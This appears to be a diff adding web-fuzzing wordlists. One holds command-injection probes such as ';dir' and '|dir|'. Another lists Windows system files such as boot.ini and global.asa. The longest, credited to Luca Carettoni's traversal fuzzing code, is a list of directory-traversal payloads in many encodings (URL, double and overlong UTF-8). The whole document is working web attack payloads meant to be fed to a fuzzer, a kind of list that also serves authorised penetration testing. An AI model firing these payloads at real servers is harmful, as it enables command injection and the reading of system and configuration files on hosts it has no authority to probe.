@ -0,0 +1,7 @@
|
|||
;dir
|
||||
`dir`
|
||||
|dir|
|
||||
|dir
|
||||
/%3f.jsp
|
||||
?M=D
|
||||
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
|
|
@ -0,0 +1,6 @@
|
|||
C:/inetpub/wwwroot/global.asa
|
||||
C:\inetpub\wwwroot\global.asa
|
||||
C:/boot.ini
|
||||
C:\boot.ini
|
||||
D:\inetpub\wwwroot\global.asa
|
||||
D:/inetpub/wwwroot/global.asa
|
|
@ -0,0 +1,882 @@
|
|||
# Derived from the awesome "Directory Traversal Fuzzing Code" v0.2 by Luca Carettoni
|
||||
# Did some cleanup & removed anything to the right of {FILE} for inclusion in a
|
||||
# separate fuzzfile for more flexibiity
|
||||
/../{FILE}
|
||||
/../../{FILE}
|
||||
/../../../{FILE}
|
||||
/../../../../{FILE}
|
||||
/../../../../../{FILE}
|
||||
/../../../../../../{FILE}
|
||||
/../../../../../../../{FILE}
|
||||
/../../../../../../../../{FILE}
|
||||
/..%2f{FILE}
|
||||
/..%2f..%2f{FILE}
|
||||
/..%2f..%2f..%2f{FILE}
|
||||
/..%2f..%2f..%2f..%2f{FILE}
|
||||
/..%2f..%2f..%2f..%2f..%2f{FILE}
|
||||
/..%2f..%2f..%2f..%2f..%2f..%2f{FILE}
|
||||
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}
|
||||
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}
|
||||
/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/..%252f{FILE}
|
||||
/..%252f..%252f{FILE}
|
||||
/..%252f..%252f..%252f{FILE}
|
||||
/..%252f..%252f..%252f..%252f{FILE}
|
||||
/..%252f..%252f..%252f..%252f..%252f{FILE}
|
||||
/..%252f..%252f..%252f..%252f..%252f..%252f{FILE}
|
||||
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}
|
||||
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}
|
||||
/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/..\{FILE}
|
||||
/..\..\{FILE}
|
||||
/..\..\..\{FILE}
|
||||
/..\..\..\..\{FILE}
|
||||
/..\..\..\..\..\{FILE}
|
||||
/..\..\..\..\..\..\{FILE}
|
||||
/..\..\..\..\..\..\..\{FILE}
|
||||
/..\..\..\..\..\..\..\..\{FILE}
|
||||
/..%255c{FILE}
|
||||
/..%255c..%255c{FILE}
|
||||
/..%255c..%255c..%255c{FILE}
|
||||
/..%255c..%255c..%255c..%255c{FILE}
|
||||
/..%255c..%255c..%255c..%255c..%255c{FILE}
|
||||
/..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
|
||||
/..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
|
||||
/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
|
||||
/..%5c..%5c{FILE}
|
||||
/..%5c..%5c..%5c{FILE}
|
||||
/..%5c..%5c..%5c..%5c{FILE}
|
||||
/..%5c..%5c..%5c..%5c..%5c{FILE}
|
||||
/..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
|
||||
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
|
||||
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
|
||||
/%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/..%c0%af{FILE}
|
||||
/..%c0%af..%c0%af{FILE}
|
||||
/..%c0%af..%c0%af..%c0%af{FILE}
|
||||
/..%c0%af..%c0%af..%c0%af..%c0%af{FILE}
|
||||
/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}
|
||||
/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}
|
||||
/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}
|
||||
/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}
|
||||
/%c0%ae%c0%ae/{FILE}
|
||||
/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}
|
||||
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}
|
||||
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}
|
||||
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}
|
||||
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}
|
||||
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}
|
||||
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}
|
||||
/%c0%ae%c0%ae%c0%af{FILE}
|
||||
/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}
|
||||
/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}
|
||||
/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}
|
||||
/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}
|
||||
/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}
|
||||
/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}
|
||||
/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}
|
||||
/..%25c0%25af{FILE}
|
||||
/..%25c0%25af..%25c0%25af{FILE}
|
||||
/..%25c0%25af..%25c0%25af..%25c0%25af{FILE}
|
||||
/..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}
|
||||
/..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}
|
||||
/..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}
|
||||
/..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}
|
||||
/..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}
|
||||
/%25c0%25ae%25c0%25ae/{FILE}
|
||||
/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}
|
||||
/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}
|
||||
/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}
|
||||
/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}
|
||||
/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}
|
||||
/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}
|
||||
/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}
|
||||
/%25c0%25ae%25c0%25ae%25c0%25af{FILE}
|
||||
/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}
|
||||
/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}
|
||||
/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}
|
||||
/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}
|
||||
/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}
|
||||
/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}
|
||||
/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}
|
||||
/..%c1%9c{FILE}
|
||||
/..%c1%9c..%c1%9c{FILE}
|
||||
/..%c1%9c..%c1%9c..%c1%9c{FILE}
|
||||
/..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}
|
||||
/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}
|
||||
/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}
|
||||
/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}
|
||||
/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}
|
||||
/%c0%ae%c0%ae\{FILE}
|
||||
/%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}
|
||||
/%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}
|
||||
/%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}
|
||||
/%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}
|
||||
/%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}
|
||||
/%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}
|
||||
/%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}
|
||||
/%c0%ae%c0%ae%c1%9c{FILE}
|
||||
/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}
|
||||
/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}
|
||||
/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}
|
||||
/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}
|
||||
/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}
|
||||
/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}
|
||||
/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}
|
||||
/..%25c1%259c{FILE}
|
||||
/..%25c1%259c..%25c1%259c{FILE}
|
||||
/..%25c1%259c..%25c1%259c..%25c1%259c{FILE}
|
||||
/..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}
|
||||
/..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}
|
||||
/..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}
|
||||
/..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}
|
||||
/..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}
|
||||
/%25c0%25ae%25c0%25ae\{FILE}
|
||||
/%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}
|
||||
/%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}
|
||||
/%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}
|
||||
/%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}
|
||||
/%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}
|
||||
/%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}
|
||||
/%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}
|
||||
/%25c0%25ae%25c0%25ae%25c1%259c{FILE}
|
||||
/%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}
|
||||
/%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}
|
||||
/%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}
|
||||
/%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}
|
||||
/%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}
|
||||
/%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}
|
||||
/%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}
|
||||
/..%%32%66{FILE}
|
||||
/..%%32%66..%%32%66{FILE}
|
||||
/..%%32%66..%%32%66..%%32%66{FILE}
|
||||
/..%%32%66..%%32%66..%%32%66..%%32%66{FILE}
|
||||
/..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}
|
||||
/..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}
|
||||
/..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}
|
||||
/..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}
|
||||
/%%32%65%%32%65/{FILE}
|
||||
/%%32%65%%32%65/%%32%65%%32%65/{FILE}
|
||||
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
|
||||
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
|
||||
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
|
||||
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
|
||||
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
|
||||
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
|
||||
/%%32%65%%32%65%%32%66{FILE}
|
||||
/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}
|
||||
/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}
|
||||
/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}
|
||||
/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}
|
||||
/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}
|
||||
/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}
|
||||
/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}
|
||||
/..%%35%63{FILE}
|
||||
/..%%35%63..%%35%63{FILE}
|
||||
/..%%35%63..%%35%63..%%35%63{FILE}
|
||||
/..%%35%63..%%35%63..%%35%63..%%35%63{FILE}
|
||||
/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}
|
||||
/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}
|
||||
/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}
|
||||
/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}
|
||||
/%%32%65%%32%65/{FILE}
|
||||
/%%32%65%%32%65/%%32%65%%32%65/{FILE}
|
||||
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
|
||||
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
|
||||
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
|
||||
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
|
||||
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
|
||||
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
|
||||
/%%32%65%%32%65%%35%63{FILE}
|
||||
/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}
|
||||
/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}
|
||||
/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}
|
||||
/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}
|
||||
/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}
|
||||
/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}
|
||||
/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}
|
||||
/../{FILE}
|
||||
/../../{FILE}
|
||||
/../../../{FILE}
|
||||
/../../../../{FILE}
|
||||
/../../../../../{FILE}
|
||||
/../../../../../../{FILE}
|
||||
/../../../../../../../{FILE}
|
||||
